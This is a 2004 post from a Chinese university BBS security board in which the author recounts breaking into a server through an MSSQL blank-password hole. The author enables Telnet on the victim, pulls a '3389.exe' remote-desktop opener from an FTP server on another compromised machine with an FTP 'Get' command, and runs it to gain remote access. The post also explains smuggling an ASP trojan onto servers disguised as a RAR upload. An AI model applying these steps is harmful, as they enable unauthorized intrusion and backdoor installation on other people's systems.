● 从 MSSQL 漏洞到开 3389 - 荔园在线 | 深圳大学学生论坛,荔园晨风BBS,深大在线网站

荔园之美，在春之萌芽，在夏之绽放，在秋之收获，在冬之沉淀

发信人: yyjoy (yy), 信区: Security
标题: 从 MSSQL 漏洞到开 3389
发信站: 荔园晨风BBS站 (Sat Jan 3 16:36:18 2004), 站内信件

扫到 XXX.XXX.XXX.XXX 有 MSSQL 空密码漏洞。。。别的除了 80, 21 以外什么都没有开
。我的目标是：开3389。。看来管理员只是一时的疏忽。呵呵。。我们要的就是他一时的
疏忽，找个 MSSQL 连接器去去吧。我用的是NT自动攻击探测机，按照习惯，IPC$试试。我
靠。。关了。。。没办法了。他又没有 BBS，我也没办法从网页方式传木马。（注：只要
对方有 BBS，在发贴的时候可以上传文件，我们可以把海阳顶端网asp木马红粉佳人修正版
改成Rar文件传到服务器上，然后再通过 MSSQL 连接器改回来，再通过ASP木马传送文件到
对方服务器上去，为什么我们不用 BBS 直接传文件，而只传ASP木马呢，因为我们一个程
序可能会有1MB，而 BBS 上他是决对不会让你传这么大的文件的。而海阳顶端网asp木马红
粉佳人修正版这个木马可以传送任意大小的文件）。再试试 TFTP 吧，弄了半天，我晕死
。怎么老是说连接超时呀。我在别的电脑上都能成功的。。郁闷。。。怎么办呢？这时我
想到一个办法，就是通过 FTP 传，我们先在别的肉鸡上做一个 FTP 服务器（如：192.168
.XXX.XXX）把你要上传的程序放到FTP目录里面去，（如：3389.exe），。。然后通过 MSS
QL 打开对方的 TELNET 服务，TELNET 上去。然后在XXX.XXX.XXX.XXX 这台电脑上通过 DO
S 方式来运行FTP。。如下： FTP 192.168.XXX.XXX 后出现如下信息:
Connected to 192.168.XXX.XXX.220 Serv-U FTP Server v4.0 for WinSock ready...
User (192.168.XXX.XXX:(none)):（在这里输入FTP用户吧，你建FTP服务器的时候自己弄
的。）
输入完成后回车，出现信息：
331 User name okay, need password.
Password:（该FTP用户的密码，输入的时候是看不见的哟。输入完回车就行了）
如果你的用户和密码正确，就已经登陆了。。。
LS一下吧。（LS就是DIR了，不会就去查FTP命令吧）。。
这下你可以看到你的 3389.exe 程序了吧。只要下载下来就行了。。
输入Get 3389.exe C:\3389.exe，慢慢等吧，正在下载呢。
呵呵。下载完了。在C:\去找3389.exe程序，看到了吗？这就是你要想上传的 3389.exe 程
序嘛。呵呵。已经到了对方计算机上了。

运行一下吧。。。。等一会他的电脑重启了。3389就可以上去了。，。。

呵呵。我的最爱。3389哟。。。

--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.79.90]

荔园在线首页友情链接：深圳大学深大招生荔园晨风BBS S-Term软件网络书店